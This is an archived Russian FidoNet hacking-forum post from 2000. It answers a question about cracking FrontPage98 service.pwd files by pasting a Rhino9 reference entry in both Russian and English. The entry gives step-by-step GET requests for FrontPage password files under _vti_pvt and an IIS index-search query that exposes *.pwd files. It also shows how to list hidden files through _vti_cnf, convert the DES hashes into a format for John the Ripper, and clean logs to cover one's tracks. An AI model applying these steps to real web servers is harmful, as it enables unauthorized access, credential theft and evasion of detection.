Главная страница


ru.nethack

 
 - RU.NETHACK -------------------------------------------------------------------
 From : Oleg Ivanov                          2:5078/30      20 May 2000  09:23:57
 To : Nik
 Subject : FronPage98
 -------------------------------------------------------------------------------- 
 
 
  N> Чем можно расшифровать пароли из сабжа , ну те которые в service.pwd
  N> лежат ?
 
 это тебе если по енглишь не очень.
 
 *** Здесь начало Windows Clipboard ***
 
 РАСШИРЕHИЯ MS FRONTPAGE
 
 Местонахождение: файлы в /_vti_pvt
 Уязвимость: возможность создания файлов на диске жертвы, просмотр файлов на
 диске. Использование:
 
 Иногда на сервер устанавливаются расширения, чтобы позволить т.н. "вебмастерам" 
 закачивать свои HTML-файлы посредством Microsoft Frontpage. Функции расширений, 
 или "web bots" позволяют многое, вплоть до управления web-server'om.
 
 Файл hacces.ctl даст вам много полезной информации, скрлючая сарположение файла 
 с паролями. Полный пример такого файла:
     # -FrontPage-
    Options None
 
     order deny,allow
     deny from all
     AuthName default_realm
 
     AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
     AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
 Список различных файлов IIS'a, расположенного на диске C:\ и их маппинги.
     C:\InetPub\wwwroot
     C:\InetPub\scripts                              /Scripts
     C:\InetPub\ftproot
     C:\InetPub\wwwroot\_vti_bin                     /_vti_bin
     C:\InetPub\wwwroot\_vti_bin\_vti_adm            /_vti_bin/_vti_adm
     C:\InetPub\wwwroot\_vti_bin\_vti_aut            /_vti_bin/_vti_aut
     C:\InetPub\cgi-bin                              /cgi-bin
     C:\InetPub\wwwroot\srchadm                      /srchadm
     C:\WINNT\System32\inetserv\iisadmin             /iisadmin
     C:\InetPub\wwwroot\_vti_pvt
 
 FrontPage создаёт папку _vti_pvt в корневой директории сервера. Каждая папка,
 куда есть доступ посредством Microsoft FrontPage, имеет уникальные права на
 доступ, и пароли, их определяющие находятся в файлах service.pwd и service.grp.
 
 Hа серверах Netcsape нет файлов service.grp с информацией о группах
 пользователей. Пароли на таких серверах хранятся в файлах:
 administrators.pwd - для администраторов
 authors.pwd - для авторов закачиваемых страниц
 users.pwd - для обычных пользователей.
 
 Как их добыть? http://www.victim.com/samples/search/queryhit.htm - это пример
 поискового механизма IIS, индексирующего файлы. Естественно, он с большой дырой 
 и по запросу вида "#filename=*.pwd", он найдёт и покажет нам все файлы с
 паролями.
 
 В плане реализации раширения FP98 крайне идиотские. Во-первых, они создают
 резервную копию каждого редактируемого файла. Если вы попали на сайт,
 обработанный таким бразом, прото - поищите в любой директории папку _vti_cnf -
 вы получите полный список файлов в ней.
 
 Отловив любой *.pwd файл, вы увидите там строки вида: User:FHGEWR79xw2. Это всем
 нам знакомый DES - так что смело переписывайте файл в формате
 FHGEWR79xw2:10:200:User:/users/User:/bin/bash и кормите этим очередного
 btuteforce cracker'a типа johna ripper'a.
 (С)team void
 
 *** Здесь конец Windows Clipboard ***
 а вот и оpигинал
 
 *** Здесь начало Windows Clipboard ***
 Name:      Microsoft Frontpage
 Date:      10 july 1998
 Versions:  Microsoft FrontPage Extensions, versions 1.0-1.1
 Risk:      unauthorized users can vandalize authorized users' files by
            appending to them or overwriting.On a system with server-side
            includes enabled, remote users may be able to exploit  this
            bug to execute commands on the server.
 Distro:    www.microsoft.com/frontpage/documents/bugQA.htm
 Source:    The MH DeskReference 1.2 by Rhino9
 
     The server extensions are installed  server side to  provide added
     functionality for frontpage web authors. These extensions function
     as "web bots" if you will, giving  web authors  that use frontpage
     easy access to complex web and HTML functions.
 
     The hacces.ctl file can give you a lot of  information,  including
     the location of the service password file. A complete  example:
 
     # -FrontPage-
 
     Options None
     <Limit GET POST PUT>
     order deny,allow
     deny from all
 
     AuthName default_realm
     AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
     AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
 
     a list of the Internet Information server files location in relation
     to the local hard drive (C:) and the web (www.target.com)
 
     C:\InetPub\wwwroot                              <Home>
     C:\InetPub\scripts                              /Scripts
     C:\InetPub\ftproot                              default for ftp
     C:\InetPub\wwwroot\_vti_bin                     /_vti_bin
     C:\InetPub\wwwroot\_vti_bin\_vti_adm            /_vti_bin/_vti_adm
     C:\InetPub\wwwroot\_vti_bin\_vti_aut            /_vti_bin/_vti_aut
     C:\InetPub\cgi-bin                              /cgi-bin
     C:\InetPub\wwwroot\srchadm                      /srchadm
     C:\WINNT\System32\inetserv\iisadmin             /iisadmin
     C:\InetPub\wwwroot\_vti_pvt
 
     FrontPage creates a directory _vti_pvt for  the root web  and  for
     each FrontPage sub-web. For each FrontPage web with unique permissions,
     the _vti_pvt directory contains two files for the  FrontPage  web
     that the access file points to:
 
     service.pwd
     - contains the list of users and passwords for the FrontPage web.
     service.grp
     - contains the list of groups (one group for authors  and one  for
     administrators in FrontPage).
 
     On Netscape servers, there are no service.grp files. The  Netscape
     password files are:
     administrators.pwd for administrators
     authors.pwd for authors and administrators
     users.pwd for users, authors, and administrators
 
     C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM
     http://www.victim.com/samples/search/queryhit.htm
     - Internet Information Index Server sample
     If Index Information Server is running under IIS, service.pwd (or
     any other file) can sometimes be retrieved. Search for
 
     "#filename=*.pwd"
 
     FP extensions are fundamentally stupid in nearly all  respects  of
     implementation. Firsly, they maintain a crapload of meta files (one
     shadow for every file managed) then they have all of their  config
     info in a bunch of text files in the _vti_pvt directory.  (Oh,BTW,
     there exists a very HUGE privacy hole  in the FP extenstions).  If
     you go to a site that has FP extensions, just pick any directory in
     the URL, yank the filename off, and put "_vti_cnf" there instead...
     you'll get a complete listing of all the files in the real directory.
     With this you can snatch files that weren't meant to be seen by the
     public...and it's available on ALL FP enabled sites.
 
     Frontpage 98 fucks up the permissions so bad that it makes the
     _vti_pvt directory WORLD WRITABLE!!! No shit, you can do whatever
     you want to stuff in that directory.
     Scanning PORT 80 (http) or 443 (https) options:
 
     GET /__vti_inf.html      #Ensures that frontpage server extensions
                                                         are installed.
     GET /_vti_pvt/service.pwd  #Contains the encrypted password files.
                                   Not used on IIS and WebSite servers
     GET /_vti_pvt/authors.pwd  #   On Netscape servers only. Encrypted
                                         names and passwords of authors.
     GET /_vti_pvt/administrators.pwd
 
     GET /_vti_log/author.log   #If author.log is there it will need to
                                        be cleaned to cover your tracks
     GET /samples/search/queryhit.htm
 
     If service.pwd is obtained it will look similar to this:
 
     Vacuum:SGXJVl6OJ9zkE
 
     Turn it into DES format:
 
     Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
 *** Здесь конец Windows Clipboard ***
  Успехов и здоровья.           ICQ UIN: 104533     Oleg Ivanov // "Liar"
 
  Hе скучайте! Я еще не прощаюсь                  /*mailto:Liar@cmpmail.com*/
 
 --- ============================Резать здесь============================
  * Origin: Hашли дурака! Я за Вас свою работу делать не буду! (2:5078/30)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор 

 Тема:    Автор:    Дата:  
 FronPage98   NiK   19 May 2000 11:23:25 
 FronPage98   Oleg Ivanov   20 May 2000 09:23:57 
 FronPage98   Neumoev Paul   20 May 2000 22:00:03 
Архивное /ru.nethack/183139265c38.html, оценка 3 из 5, голосов 10
Яндекс.Метрика
Valid HTML 4.01 Transitional